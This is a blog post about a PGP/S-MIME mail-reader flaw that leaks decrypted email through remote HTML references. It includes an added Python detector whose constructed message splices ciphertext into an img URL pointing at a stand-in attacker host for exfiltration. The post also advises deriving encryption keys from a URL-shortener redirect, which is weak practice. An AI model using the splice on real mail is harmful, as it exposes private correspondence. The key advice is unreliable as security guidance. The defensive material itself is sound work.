Warning: PGP Fail in Major Email Readers

Just yesterday I released a video discussing the merits of using Encipher.it, mainly because your system will not become littered with PGP/GPG keys and keyring files, which would result in much deeper forensic scrutiny and/or cipher compromise if an adversary ever comes into possession of, or gains remote control over, your phone, notebook or computer.


Today, Ars Technica published a story describing how Outlook, macOS Mail, Airmail and Thunderbird, some of the most widely used email readers on the planet, are vulnerable to a PGP and S/MIME flaw that can reveal the cleartext (the original, unencrypted text) of your encrypted email to an attacker. Even Proton Mail, Horde, and Postbox are affected.

See the article at Ars for the full list tested. 

The attack does not need your private key. An adversary who already holds a copy of the ciphertext (for example through login or API access to your inbox) wraps it in crafted HTML and sends it to you; when your reader decrypts the message and renders that HTML, the decrypted text lands inside a remote reference such as an image URL, and the automatic fetch delivers the cleartext to the attacker's server. Opening such a message, and therefore also starting a reply to it, is enough to trigger the decryption. Thus an attacker with access to your email inbox could obtain the cleartext of any stored encrypted message he or she desires.
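The following is an added example, not code from the original post, from the EFAIL researchers, or from any mail client. It parses two constructed sample messages (the ciphertext in them is a placeholder, nothing is decrypted) and shows three things a practitioner wants to see: how to spot the splice in stored mail (an HTML part ending in an open tag right before an encrypted part), what a reader that decrypts in place and renders HTML would end up fetching, and how stripping remote references (the plain-text / no-remote-content mitigation) removes the exfiltration channel. All hostnames are hypothetical.

```python
"""Detect and neutralise the HTML exfiltration pattern behind the PGP/S-MIME
mail-reader flaw.  Added example; the messages below are constructed."""
import re
from email import message_from_string, policy

# Content types that a mail reader would decrypt in place.
ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime"}

# Remote references an HTML renderer fetches on its own: src/href attributes
# and CSS url(...) values pointing at http(s) hosts.
REMOTE_REF = re.compile(
    r'(\b(?:src|href)\s*=\s*["\']?|url\(\s*["\']?)(https?://[^"\'\s>)]+)', re.I)

# Constructed: attacker splices an encrypted part between two HTML parts that
# together form one <img> tag.  The octet-stream body is a placeholder.
CRAFTED = """\
From: attacker@example.invalid
To: victim@example.invalid
Subject: Re: quarterly numbers
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset=utf-8

<html><body><img src="https://attacker.example.invalid/collect?d=
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
(placeholder ciphertext, constructed for this example)
-----END PGP MESSAGE-----
--inner--
--outer
Content-Type: text/html; charset=utf-8

"></body></html>
--outer--
"""

# Constructed: an ordinary PGP/MIME message with no HTML wrapper.
BENIGN = """\
From: alice@example.invalid
To: bob@example.invalid
Subject: quarterly numbers
MIME-Version: 1.0
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1
--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
(placeholder ciphertext, constructed for this example)
-----END PGP MESSAGE-----
--inner--
"""


def parse(raw: str):
    """Parse a raw message with the modern email policy."""
    return message_from_string(raw, policy=policy.default)


def ends_inside_open_tag(html: str) -> bool:
    """True when the HTML stops inside a tag, e.g. '...<img src="https://x?d='."""
    last_open = html.rfind("<")
    return last_open != -1 and html.find(">", last_open) == -1


def bridges_encrypted_part(msg) -> bool:
    """Flag the splice: an HTML part ending in an open tag immediately followed
    by an encrypted part, so decrypted text lands inside an attribute value."""
    parts = list(msg.walk())  # depth-first, in document order
    for part, following in zip(parts, parts[1:]):
        if part.get_content_type() != "text/html":
            continue
        if following.get_content_type() not in ENCRYPTED_TYPES:
            continue
        if ends_inside_open_tag(part.get_content()):
            return True
    return False


def rendered_view(msg, plaintext: str) -> str:
    """What a reader that decrypts in place and renders HTML would display:
    the HTML parts with the (here, supplied) cleartext in the encrypted slot."""
    out = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/html":
            out.append(part.get_content())
        elif ctype in ENCRYPTED_TYPES:
            out.append(plaintext)
    return "".join(out)


def remote_references(html: str) -> list:
    """URLs a renderer would fetch automatically from this HTML."""
    return [m.group(2) for m in REMOTE_REF.finditer(html)]


def strip_remote_references(html: str) -> str:
    """Mitigation: empty every remote src/href/url() so nothing is fetched.
    Turning off HTML or remote content in the reader has the same effect."""
    return REMOTE_REF.sub(r"\1", html)


if __name__ == "__main__":
    msg = parse(CRAFTED)
    print("spliced:", bridges_encrypted_part(msg))
    view = rendered_view(msg, "Merger-closes-Friday")  # constructed cleartext
    print("would fetch:", remote_references(view))
    print("after stripping:", remote_references(strip_remote_references(view)))
```

A real renderer percent-encodes spaces before fetching, which is why the sample cleartext is written without them; the point is the same either way: whatever the reader decrypts becomes part of a URL the attacker's server logs.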

If you cannot abandon the PGP channel in your email reader right away, you can reduce the risk considerably by switching from HTML to plain-text display and disabling automatic loading of remote content, which closes the channel through which the cleartext is exfiltrated. Bear in mind that anyone with login or API access to your inbox already holds the ciphertext, so this only buys time until a patch ships. Also, do not reply to any incoming email that quotes or references a previous encrypted communication; start a new email to that person instead.

Best practice would be to abandon that 'secure' channel altogether until the vulnerabilities are patched. Thunderbird has already committed a fix to its code base (but not yet distributed it), while we are still waiting on initial responses from Apple and Microsoft.

Best bet: use a secure voice call in Signal to agree on a long, complicated key, and use Encipher.it to encrypt and decrypt your sensitive traffic. Try to agree on a method of 'calculating' the key rather than stating the key itself, even in conversation. Simple example: take the full web address that bitl.ly/ronzkey redirects to and use that resulting address as your key (never email this sort of information!). Keep in mind that anyone who learns the short link can resolve it just as you do, so the link must stay as secret as the key. Try that on the ciphertext below, just for fun.

Stay safe out there.

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
V0GMUa5YYUiR/plqYZgIwWDh97mRFIwEmS

Decrypt it at https://encipher.it
